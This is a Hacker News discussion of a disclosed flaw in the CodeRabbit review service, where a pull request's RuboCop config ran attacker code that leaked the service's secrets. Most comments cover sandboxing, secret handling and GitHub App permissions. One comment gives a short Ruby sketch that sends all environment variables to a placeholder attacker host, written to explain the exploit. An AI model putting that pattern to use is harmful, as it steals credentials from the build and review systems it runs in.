> After responsibly disclosing this critical vulnerability to the CodeRabbit team, we learned from them that they had an isolation mechanism in place, but Rubocop somehow was not running inside it.

Curious what this (isolation mechanism) means if anyone knows.

reply
diggan
3 days ago
[-]
> Curious what this (isolation mechanism) means if anyone knows.

If they're anything like the typical web-startup "developing fast but failing faster", they probably are using docker containers for "security isolation".

reply
benmmurphy
3 days ago
[-]
What a lucky coincidence that the tool the researcher attacked because it allowed code execution was not sandboxed.
reply
kachapopopow
3 days ago
[-]
you could say that they have vibe forgotten to sandbox it.

(likely asked AI to implement x and ai completely disregarded the need to sandbox).

reply
nphardon
3 days ago
[-]
Oh, it really makes my day when we get a hacker post here at the top. This is so well written too: no mystique, just a simple sequence of logical steps, with pictures.
reply
brainless
3 days ago
[-]
I did not understand something: why did CodeRabbit run external tools on external code within its own set of environment variables? Why are these variables needed for this entire tooling?
reply
tadfisher
3 days ago
[-]
> Why are these variables needed for this entire tooling?

They are not. The Github API secret key should never be exposed in the environment, period; you're supposed to keep the key in an HSM and only use it to sign the per-repo access token. Per the GH docs [0]:

> The private key is the single most valuable secret for a GitHub App. Consider storing the key in a key vault, such as Azure Key Vault, and making it sign-only. This helps ensure that you can't lose the private key. Once the private key is uploaded to the key vault, it can never be read from there. It can only be used to sign things, and access to the private key is determined by your infrastructure rules.

> Alternatively, you can store the key as an environment variable. This is not as strong as storing the key in a key vault. If an attacker gains access to the environment, they can read the private key and gain persistent authentication as the GitHub App.

[0]: https://docs.github.com/en/apps/creating-github-apps/authent...
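
To give a sense of what "sign-only" means in practice, here's a rough sketch of building the app JWT where the RS256 signature comes out of a cloud KMS and the private key never touches the service at all (Google Cloud KMS client shown; the key path is a placeholder and the key version would need to be an RSA-PKCS1-SHA256 signing key):

    # Sketch: mint a GitHub App JWT without ever holding the private key.
    # Assumes google-cloud-kms is installed and the key version uses
    # RSA_SIGN_PKCS1_2048_SHA256 (which matches JWT "RS256").
    import base64, hashlib, json, time
    from google.cloud import kms

    KEY_VERSION = "projects/p/locations/l/keyRings/r/cryptoKeys/gh-app/cryptoKeyVersions/1"
    APP_ID = "12345"   # placeholder

    def b64url(data: bytes) -> str:
        return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

    def kms_signed_app_jwt() -> str:
        now = int(time.time())
        header = b64url(json.dumps({"alg": "RS256", "typ": "JWT"}).encode())
        claims = b64url(json.dumps({"iat": now - 60, "exp": now + 540, "iss": APP_ID}).encode())
        signing_input = f"{header}.{claims}".encode()

        # The key never leaves the KMS; we only ever get a signature back.
        client = kms.KeyManagementServiceClient()
        digest = hashlib.sha256(signing_input).digest()
        resp = client.asymmetric_sign(
            request={"name": KEY_VERSION, "digest": {"sha256": digest}}
        )
        return f"{header}.{claims}.{b64url(resp.signature)}"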

reply
immibis
3 days ago
[-]
Environment variables used to be standard practice for API keys. It seems like every time someone finds a way to get a key, standard practice gets more convoluted.
reply
progbits
2 days ago
[-]
It's not convoluted. Env vars are fine for places where you need the value. If your application talks to service X with API key then sure, give it that via env var (mounted from some secret manager, so it's only mounted in production).

But there are two very wrong things here:

1. You don't send the private key to github like an API key, you use it to sign requests. So there is no reason for any application, even your trusted backend, to ever see that key. Just have it request signatures from a vault, and the vault can log each access for audit etc.

2. Even if you really trust your backend and give it the key, why the fuck does the sandboxed runner get it? And don't tell me it's easy to make a mistake and accidentally inherit it somehow. The runner should be on completely separate node, separate network, everything, it only gets the untrusted code to run as input and nothing more, and gives output back.

reply
codedokode
2 days ago
[-]
A standard practice imho is configuration files. They are better in almost every respect.
reply
gdbsjjdn
3 days ago
[-]
It sounds like they were putting these processes in a chroot jail or something and not allowing them to access the parent process env vars. There's a continuum of ways to isolate child processes in Linux that don't necessarily involve containers or docker.
reply
immibis
2 days ago
[-]
They probably didn't know that Rubocop could be configured to run arbitrary code. When I 'cat' or 'grep' a file from a repository I don't run 'cat' or 'grep' in a sandbox. They probably assumed the same was true of Rubocop - that it just treats its input as input and not as instructions.
reply
The_Fox
3 days ago
[-]
Their own tools would need the various API keys, of course, and they did build a method to filter out those variables and managed most user code through it, but it sounds like they forgot to put Rubocop through the special method.

So this researcher may have gotten lucky in choosing to dig into the tool that CodeRabbit got unlucky in forgetting.

reply
chuckadams
3 days ago
[-]
It sounds like a pretty bad approach in general to have to "filter out the bad stuff" on a case-by-case basis. It should be as simple as launching everything from a sanitized parent environment, and making it impossible to launch any tool otherwise. Or better, make that sanitized environment the default and make privileged operations be the thing that jumps through hoops to talk to a bastion/enclave/whatever that holds the actual keys.
reply
The_Fox
3 days ago
[-]
Yes, although somewhere there will be an `if` statement to determine whether the process being started should get the complete environment, or a key to get the other keys, or whatever. Best to make that `if` at as high a level of the architecture as possible and wrap it in something that makes it obvious, like a `DangerousUserCodeProcess` class.

The only other safety I can think of is a whitelist, perhaps of file pathnames. This helps to maintain a safe-by-default posture. Taking it further, the whitelist could be specified in config and require change approval from a second team.

reply
elpakal
3 days ago
[-]
presuming they take the output of running these linters and pass it for interpretation to Claude or OpenAI
reply
roywiggins
3 days ago
[-]
It's very silly that the linter process was handed those environment variables, since it wasn't going to do anything with them and didn't need them.
reply
vedmakk
2 days ago
[-]
if op is reading the comments here: the screenshot where CodeRabbit has discovered the security vulnerability in the PR contains the actual ip address the env vars were sent to. No big deal, just you carefully used 1.2.3.4 in the rest of the article only to leak it in the screenshot. fyi.
reply
hahn-kev
3 days ago
[-]
Why does CodeRabbit need write access to the git repo? Why doesn't GitHub let me limit its access?
reply
dpcx
3 days ago
[-]
Because it has the ability to write tests for the PR in question.
reply
tadfisher
3 days ago
[-]
Then it should open a PR for those tests so it can go through the normal CI and review process.
reply
tedivm
3 days ago
[-]
Doing that requires write access if you're a Github Application. You can't just fork repositories back into another org, since Github Applications only have the permissions of the single organization that they work with. Rulesets that prevent direct pushes to specific branches can help here, but have to be configured for each organization.
reply
dpcx
3 days ago
[-]
It updates the existing PR with the tests, I believe. They'd still get reviewed and go through CI.
reply
tadfisher
3 days ago
[-]
Right, the downside being that the app needs write access to your repository.
reply
rahkiin
3 days ago
[-]
Writing to PR branches should really be some new kind of permission.
reply
flippyhead
3 days ago
[-]
It's more than that. It can suggest fixes which you can directly commit.
reply
dpacmittal
3 days ago
[-]
I hope the author received a nice well deserved bounty for this find. Could have been catastrophic in the wrong hands.
reply
cube00
3 days ago
[-]
When they're spinning it [1] as a PR opportunity with no mention of the breach there won't be a bounty.

[1]: https://news.ycombinator.com/item?id=44954242

reply
eranation
3 days ago
[-]
This is very similar to a CVE I discovered in cdxgen (CVE-2024-50611), which is similar to another CVE in Snyk's plugin (CVE-2022-24441). tl;dr if you run a scanner on untrusted code, ensure it doesn't have a way of executing that code.

Some ways to prevent this from happening:

1. Don't let spawned processes have access to your env; all major languages have ways to allowlist the set of env vars a subprocess needs (see the sketch after this list)

2. Don't store secrets in env vars, use a good secrets vault (with a cache)

3. Tenant isolation as much as you can

4. And most obviously - don't run processes that can execute the code they are scanning, especially if that code is not your code (harder to tell, but always be paranoid)
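
On point 1, a minimal sketch of the allowlist approach (Python shown; the scanner only gets the handful of variables it actually needs):

    import os
    import subprocess

    # What the tool genuinely needs - API keys and app secrets are not on this list.
    ALLOWED_ENV = ("PATH", "HOME", "LANG", "TMPDIR")

    def run_scanner(cmd: list[str], cwd: str) -> subprocess.CompletedProcess:
        child_env = {k: os.environ[k] for k in ALLOWED_ENV if k in os.environ}
        return subprocess.run(
            cmd,
            cwd=cwd,
            env=child_env,          # nothing else leaks into the child
            capture_output=True,
            text=True,
            timeout=300,
        )

    # result = run_scanner(["rubocop", "--format", "json"], "/tmp/untrusted-checkout")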

reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit here. we wish to note that this RCE was reported and fixed in January. it was entirely prospective and no customer data was affected. we have extensive sandboxing for basically any execution of anything now, including any and every tool and all generated code of any kind under the CodeRabbit umbrella.

if you want to learn how CodeRabbit does the isolation, here's a blog post about how: https://cloud.google.com/blog/products/ai-machine-learning/h...

reply
mpeg
3 days ago
[-]
Where can we find the blog post you made back in January about the RCE fix explaining what measures you took to check if any customer data had been affected?
reply
cleverwebb
3 days ago
[-]
how do you know that no customer data was affected? did you work with github and scan all uses of your keys? how do you know if a use of your github key was authentic or not? did you check with anthropic/openai/etc to scan log usage?

It's really hard to trust a "hey we got this guys" statement after a fuckup this big

reply
Xunjin
3 days ago
[-]
That's why countries should start to legislate on these matters; there are no incentives to focus on security and to properly report such vulnerabilities to customers.
reply
thyrfa
3 days ago
[-]
How can you guarantee that nobody ripped the private key before the researcher told you about the issue though?
reply
KingOfCoders
3 days ago
[-]
Or has a backdoor installed somewhere?
reply
blibble
2 days ago
[-]
if they can't guarantee this then every single repo that had coderabbit is potentially compromised
reply
frankfrank13
3 days ago
[-]
Reading this, it's not clear how your blog post relates:

1. You run git clone inside the GCR function, so, you have at the very least a user token for the git provider

2. RCE exploit basically used the external tools, like a static analysis checker, which again, is inside your GCR function

3. As a contrived example, if I could RCE `console.log(process.env)` then seemingly I could do `fetch(mywebsite....`

I get it, you can hand wave some amount of "VPC" and "sandbox" here. But, you're still executing code, explicitly labeling it "untrusted" and "sandboxed" doesn't excuse it.

reply
progbits
2 days ago
[-]
> no customer data was affected

Someone could have taken the private github key and cloned your customers' private repos.

You would need to audit every single access to github made via your app since the beginning and link it somehow to your side. Did you do this?

reply
yunohn
3 days ago
[-]
While I fully understand that things sometimes get missed, it just seems really bizarre to me that somehow “sandboxing/isolation” was never considered prior to this incident. To me, it feels like the first thing to implement in a system that is explicitly built to run third party untrusted code?
reply
wging
3 days ago
[-]
The article seems to imply that something of the sort had actually been attempted prior to the incident, but was either incomplete or buggy. I'm not sure the details would be entirely exculpatory, but unless you want to flatly disbelieve their statements, "not considered" isn't quite right.

> After responsibly disclosing this critical vulnerability to the CodeRabbit team, we learned from them that they had an isolation mechanism in place, but Rubocop somehow was not running inside it.

reply
roywiggins
3 days ago
[-]
It seems to me that they thought the linter would be safe to run as it wasn't meant to actually run untrusted code, just statically analyze it.
reply
elpakal
3 days ago
[-]
> Sandboxing: All Cloud Run instances are sandboxed with two layers of sandboxing and can be configured to have minimal IAM permissions via dedicated service identity. In addition, CodeRabbit is leveraging Cloud Run's second generation execution environment, a microVM providing full Linux cgroup functionality. Within each Cloud Run instance, CodeRabbit uses Jailkit to create isolated processes and cgroups to further restrict the privileges of the jailed process.

In case you don't want to read through the PR

reply
0x457
3 days ago
[-]
I don't get it, if you're running on linux then just use Landlock LSM inside a VM.
reply
KingOfCoders
3 days ago
[-]
The chuzpe to use this as PR.
reply
woodruffw
2 days ago
[-]
Off topic, but: chutzpah is the conventional English spelling :-)

Edit: I'm this old when I learned that Germans spell it "chuzpe."

reply
KingOfCoders
2 days ago
[-]
I'm this old to learn that the Yiddish spelling is chutzpe with a `T` (thought it would be Chuzpe).
reply
Xunjin
3 days ago
[-]
Silicon Valley sitcom comedy moment right here.
reply
tadfisher
3 days ago
[-]
But do you still store your GH API private key in environment variables?
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
musicnarcoman
3 days ago
[-]
So the CodeRabbit application with access to application secrets still runs in the same virtual machine as untrusted code from the outside?
reply
megamorf
2 days ago
[-]
Howon, you can stop posting that canned response. It's not helping the discussion in any way and matches the lack of detail the other commenters have pointed out.
reply
smsm42
2 days ago
[-]
The word "now" here is kinda worrying tbh. How was it a good idea to release and sell this product before that was the case?
reply
jsbg
3 days ago
[-]
wild to comment this
reply
cleverwebb
3 days ago
[-]
I had a visceral and (quite audible) reaction when I got to the environment variable listing.
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
tnolet
3 days ago
[-]
what does that mean? Were the leaked keys irrelevant?
reply
hotsauceror
3 days ago
[-]
This is the third or fourth time you’ve spammed this exact comment in response to people’s perfectly legitimate questions. What is this clown-show bullshit?
reply
username223
2 days ago
[-]
That's some next-level incompetence:

1. Allow poorly-vetted third-party tools to run in CodeRabbit's privileged environment. The exploit used a Ruby code analysis tool that was probably written 15 years ago and meant to be run locally by trusted developers, who already had access to /bin/sh.

2. Ask for coarse-grained permission to access and modify others' code without any checks.

Either of those by itself would be bad enough. The future looks bright for black or white hats who understand computers.

reply
socalgal2
2 days ago
[-]
I've ranted about this before and been downvoted, ignored as "not an issue" but, IMO, Github is majorly to blame for this. They under-invested in their permission system so 3rd party apps are effectively encouraged to ask for "root" permissions.

Effectively, many (most?) 3rd party github integrations basically ask you to type in your github ID. Then they use the github API and ask for maximal permissions. This lets them make it easy for you to use their services because they can do all the rest of the setup for you. But, NO ONE SHOULD EVER GIVE THIS KIND OF PERMISSION.

Any 3rd party service that said "give us root to your servers" would be laughed out of the market. But, that's what github has encouraged because their default workflow leaves it up to the developer to do the right thing.

Instead, github's auth UX should (1) require you to choose repos (2) not allow picking "all repos" (3) require to you select each and every permission (4) not have an option for "all permissions".

As an analogy (though poor). iOS and MacOS don't say "this app wants all these permissions, yes/no" (android used to do this). Instead, they ask one at a time (camera? mic? photos? network?) etc... I'm not suggesting that github ask one at a time. I am suggesting that github provide a default UI that lists all the permissions, per repo, and has no way to auto-populate it so the user is required to choose.

Further, I would argue that github should show the integrations and permissions for any repo. The hope being if I see "lib X uses integration Y with write permission" then I know lib X is not trustworthy because it's open to supply chain attacks (more than lib Z which has no write integrations)

reply
pabs3
2 days ago
[-]
Developer tools really need to be more mindful of the fact that on developer machines, the current directory should not be trusted, and arbitrary code should not be executed from it. The git project has been learning this the hard way, and others should too.

For check-all-the-things (a meta-linter), we disable the default rubocop config file using the "--config /dev/null" option.

reply
edm0nd
3 days ago
[-]
No bounty was paid for this?
reply
cube00
3 days ago
[-]
I can't say I'm surprised they didn't pay a bounty when they couldn't even own up to this on their own blog [1].

Instead they took it as an opportunity to market their new sandboxing on Google's blog [2] again with no mention of why their hand was forced into building the sandboxing they should have had before they rushed to onboard thousands of customers.

I have no idea what their plan was. They had to have known the researchers would eventually publish this. Perhaps they were hoping it wouldn't get the same amount of attention it would if they posted it on their own blog.

[1]: https://news.ycombinator.com/item?id=44954560

[2]: https://news.ycombinator.com/item?id=44954242

reply
mpeg
3 days ago
[-]
First thing I looked for... this is an absolutely critical vulnerability that if exploited would have completely ruined their business. No bounty!?
reply
vntok
3 days ago
[-]
Why would they pay anything? The researchers offered them the vuln analysis for free, unprompted.

If anything, they got paid in exposure.

reply
cube00
3 days ago
[-]
Let's hope the grants keep coming in because those researchers will start getting offers from the darker corners of the web if bounties aren't paid.
reply
iTokio
3 days ago
[-]
That’s why I’m worried about the growing centralization of things such as Chrome, Gmail, AWS, Cloudflare…

It’s very efficient to delegate something to one major actor but we are introducing single points of failure and are less resilient to vulnerabilities.

Critical systems should have defenses in depth, decentralized architectures and avoid trusting new providers with too many moving parts.

reply
ewok94301
2 days ago
[-]
While GitHub needs to invest in finer grained permissioning, I do think there’s lots of lessons for companies building with and customers using GitHub App based deployments. Jotted down my thoughts here https://www.endorlabs.com/learn/when-coderabbit-became-pwned...
reply
elpakal
2 days ago
[-]
So if their GH API token with access to a million plus repos was this easy to compromise, isn't it plausible that their token could have been used to clone said repos? Is it possible to audit the clone history of a token?
reply
kmarc
2 days ago
[-]
My nightmare is that one of those auto-updating vim/vscode/your-favorite-IDE plug-ins that many of us happily use on all the monorepos we work on will at some point invoke a "linter" (or, as in this case, configure a linter maliciously) and we start leaking the precious IP to random attackers :-(

In fact, I use rubocop every day lately LOL

reply
t0duf0du
2 days ago
[-]
Even with proper sandboxing, storing all sensitive credentials as environment variables is still a security anti-pattern. ENV vars are too easily accessible - any code in the process (or any child process that inherits them) can just call ENV.to_h and dump everything.
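A small Ruby illustration of the point (the variable name and value are placeholders): anything in the parent's ENV is visible to its own code and, by default, inherited by every child process it spawns.

```
# The secret sits in the process environment...
ENV["POSTGRESQL_PASSWORD"] = "hunter2"   # placeholder value

# ...so any code in this process can dump it,
p ENV.to_h.select { |k, _| k.start_with?("POSTGRESQL_") }

# ...and so can any child process, because ENV is inherited by default.
system("ruby", "-e", 'puts ENV["POSTGRESQL_PASSWORD"]')

# One mitigation: spawn tools with an explicit, minimal environment.
system({ "PATH" => ENV["PATH"] }, "ruby", "-e", "p ENV.to_h.keys",
       unsetenv_others: true)            # the child sees only PATH
```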
reply
marksomnian
2 days ago
[-]
If I were a CodeRabbit customer, I'd still be pretty concerned after reading that.

How can CodeRabbit be certain that the GitHub App key was not exfiltrated and used to sign malicious tokens for customer repos (or even used for that in-situ)? I'm not sure if GitHub supports restricting the source IPs of API requests, but if it does, it'd be a trivial mitigation - and one that is absent from the blog post.

The claim that "no malicious activity occurred" implies that they audited the activities of every repo that used Rubocop (or any other potential unsandboxed tool) from the point that support was added for it until the point that the vulnerability was fixed. That's a big claim.

And why only publish this now, when the Kudelski article makes it to the top of HN, over six months after it was disclosed to them?

reply
jatins
2 days ago
[-]
> No customer data was accessed and the vulnerability was quickly remediated within hours of disclosure

How do they know this -- do they have any audit logs confirming it? A malicious actor could have been exploiting this for months for all they know.

reply
oblio
2 days ago
[-]
> How do they know this

They know because it would affect their fundraising, so obviously customer data wasn't affected.

reply
sitzkrieg
3 days ago
[-]
comically bad. get used to more of this
reply
kachapopopow
3 days ago
[-]
Unrelated to the article, but the first time I saw them was in a Twitter ad with a comically bull** suggestion. I cannot take seriously a company that put something like that in an ad that is supposed to show the best they're capable of.
reply
nodesocket
2 days ago
[-]
How are they getting access to the PostgreSQL database, unless this running code can communicate with it? That's a big red flag; user-provided code should always be sandboxed and isolated, right?
reply
megamorf
2 days ago
[-]
The exfiltrated environment variables contained these entries:

```
"POSTGRESQL_DATABASE": "(CENSORED)",
"POSTGRESQL_HOST": "(CENSORED)",
"POSTGRESQL_PASSWORD": "(CENSORED)",
"POSTGRESQL_USER": "(CENSORED)",
```

reply
nodesocket
2 days ago
[-]
Sure, but connections from these worker machines shouldn’t be allowed directly to the database.
reply
_pdp_
2 days ago
[-]
Amateur level of security - what more is there to say?
reply
viraptor
2 days ago
[-]
The bigger the system, the more "amateur level of security" issues you'll find. It's not really a skill problem on its own.
reply
pengaru
3 days ago
[-]
This third party app gets write access to your repository, so it can do automated reviews of PRs?

Why would you even grant it such permissions? This is ridiculous.

reply
kmarc
2 days ago
[-]
Besides the fact that this was clearly a security f*ckup, in my mind it's almost equivalent to running those third party linters in our Internet-connection-enabled editors and IDEs. Other than one banking project, I don't think I've ever had to sandbox my editor in any way.

Scary.

reply
mariocandela
2 days ago
[-]
I'm sorry about CodeRabbit's reputation; it's really a great project!
reply
KingOfCoders
2 days ago
[-]
They let the static analysis tool get its config from the PR? Is this madness?

Or did I read the article wrong?

reply
megamorf
2 days ago
[-]
The security researcher noticed that CodeRabbit runs linters against your code base and that Rubocop was among the provided linters. Rubocop supports extensions that contain custom code, so he crafted an extension that exfiltrated the environment variables of the running Rubocop process when it linted the contents of his PR.
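A rough sketch of that technique (not the researchers' actual payload; the file name and URL are invented): a PR adds a `.rubocop.yml` whose `require:` list points at a Ruby file in the same PR, and RuboCop `require`s that file while loading the config, before any linting happens.

```
# exfil_cop.rb -- hypothetical file referenced by the PR's .rubocop.yml, e.g.:
#
#   require:
#     - ./exfil_cop.rb
#
# Because RuboCop requires this file at config-load time, the code below runs
# with whatever environment the linter process was given.
require "net/http"
require "json"

Net::HTTP.post(
  URI("https://attacker.example/collect"),   # attacker-controlled endpoint (made up)
  ENV.to_h.to_json,
  "Content-Type" => "application/json"
)
```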
reply
KingOfCoders
2 days ago
[-]
But where does the configuration for Rubocop come from? From CodeRabbit (e.g. you configure it on their server for your repo), from the repository, or from (new) config files in the PR?
reply
rglynn
1 day ago
[-]
Both the repo and new config in the PR.
reply
KronisLV
2 days ago
[-]
> Instead, it would be best to assume that the user may be able to run untrusted code through these tools. So, running them in an isolated environment, with only the minimum information required to run the tools themselves, and not passing them any environment variables would be much better. Even if arbitrary code execution would be possible, the impact would be much less severe.

> For defense in depth, one should add a mechanism that prevents sending private information to an attacker-controlled server. For example, only allow outgoing traffic to whitelisted hosts, if possible. If the tool doesn’t require internet access, then all network traffic may even be disabled in that isolated environment. This way it would make it harder for an attacker to exfiltrate secrets.

I yearn to live in a world where this is the default or at least REALLY EASY to do, where you just fall into the pit of success.

And yet, we live in a borderline insane world where one key getting leaked can pwn a million repos - if nothing else, there should be one key per interaction with account/repo. Not to mention that Rubocop (and probably other tools, eventually) has arbitrary code execution as a feature.

I don't think that CodeRabbit messed up, as much as everything around them is already messed up.
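As a rough sketch of what the quoted advice could look like in practice (the image name is a placeholder and is assumed to have RuboCop preinstalled):

```
# Run the linter in a throwaway container with no network and no host env vars:
# nothing to exfiltrate, and nowhere to send it.
ok = system(
  "docker", "run", "--rm",
  "--network", "none",             # no egress at all
  "-v", "#{Dir.pwd}:/src:ro",      # PR checkout mounted read-only
  "rubocop-sandbox:latest",        # hypothetical image with RuboCop installed
  "rubocop", "--config", "/dev/null", "/src"
)
# No -e flags are passed, so the container never sees the host's secrets.
puts(ok ? "lint clean" : "lint failed or found offenses")
```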

reply
thewisenerd
3 days ago
[-]
globally scoped installations or keys always scare me for this reason

i believe the answer here was to exchange the token for something scoped to the specific repo coderabbit is running in, but alas, that doesn't remove the "RCE" _on_ the repo

reply
tadfisher
3 days ago
[-]
They do that; this is how GH apps work. There is no reason to expose the app's private key in the environment for the code that actually runs on the PR.
reply
thewisenerd
3 days ago
[-]
even if they did not have the PEM file left in the environment, the token is still widely scoped and has the same scope as the PEM

what i'm clearly mis-remembering is being able to exchange the token for a smaller scope e.g., hey~ sign this jwt, with scopes=[org/repo1, org/repo2, permissions=write]

reply
deathanatos
2 days ago
[-]
> the token is still widely scoped and has the same scope as the PEM

What the person above you is trying to tell you is that no, it doesn't.

The authentication flow is that the private key is used to sign an initial JWT; that gets you access to some GH API calls. From there you exchange that JWT for an access token with smaller scope, scoped only to the installation in question.

While the tool execution environment ought to have had none of the credentials, it could at least have held onto only the installation access token.
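A minimal sketch of that flow in Ruby (assuming the `jwt` gem; the app ID, installation ID, and key path are placeholders):

```
require "jwt"
require "openssl"
require "net/http"
require "json"

APP_ID          = 12345   # placeholder GitHub App ID
INSTALLATION_ID = 67890   # placeholder installation ID

# 1. Sign a short-lived app JWT with the App's private key (RS256, <= 10 min).
key = OpenSSL::PKey::RSA.new(File.read("github-app.pem"))
now = Time.now.to_i
app_jwt = JWT.encode({ iat: now - 60, exp: now + 540, iss: APP_ID }, key, "RS256")

# 2. Exchange it for an installation access token, which is scoped to that
#    installation only and expires after about an hour.
uri = URI("https://api.github.com/app/installations/#{INSTALLATION_ID}/access_tokens")
req = Net::HTTP::Post.new(uri,
  "Authorization" => "Bearer #{app_jwt}",
  "Accept"        => "application/vnd.github+json")
res = Net::HTTP.start(uri.host, uri.port, use_ssl: true) { |http| http.request(req) }
installation_token = JSON.parse(res.body)["token"]

# Only this short-lived token -- never the PEM or the app JWT -- should be
# anywhere near the environment that runs repo-controlled tools.
puts(installation_token ? "got installation token" : res.body)
```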

reply
thewisenerd
2 days ago
[-]
ah, understood. PEM leakage aside:

the scope of the exchanged token is the scope of the installation (org / repo); thereby limiting exposure already

to further reduce the scope of exposure, the jwt would've needed to be exchanged with the specific `repositories` (given most installations are org scoped) and `permissions`

https://docs.github.com/en/apps/creating-github-apps/authent...
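Per the docs linked above, the exchange can be narrowed by sending a JSON body naming specific repositories and permissions; a hypothetical body (repo names and permissions made up) might look like:

```
require "json"

# Hypothetical body for POST /app/installations/{installation_id}/access_tokens,
# narrowing the returned token to two repos and only the listed permissions.
scoped_request = {
  repositories: ["repo1", "repo2"],
  permissions:  { "contents" => "read", "pull_requests" => "write" }
}
puts JSON.pretty_generate(scoped_request)
```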

reply
ianbutler
2 days ago
[-]
If you're a concerned user looking for a solution founded by two people with a security background, with sandboxed (and network-limited) execution so stuff like this can't happen, you should check us out.

We even offer a self-hosted deployment, which sidesteps this entirely (feel free to reach out).

www.bismuth.sh

reply
dominodave01
2 days ago
[-]
this spiraled fast
reply
eoncode
2 days ago
[-]
For the author of the page: check the screenshot under "context is key"; I think you missed censoring a public IP.
reply
gregjw
2 days ago
[-]
yikes!
reply
binarydreams
3 days ago
[-]
I've noticed CodeRabbit at times does reviews that are super. It is able to catch bugs that even Claude Code misses on our GitHub PRs. Blows my mind tbh.

Based on the env vars, it seems like they're using Anthropic, OpenAI, etc. only?

reply
tnolet
3 days ago
[-]
Interesting. We removed it, as it was mostly too verbose, caught too many false positives, and never really added anything useful.
reply
flippyhead
3 days ago
[-]
You can comment on this in the PR and supposedly it'll remember and get better.
reply
jacobsenscott
3 days ago
[-]
> catch bugs that even claude code misses on our Github PRs

Is that good? I assume it just catches a different 10% of the bugs.

reply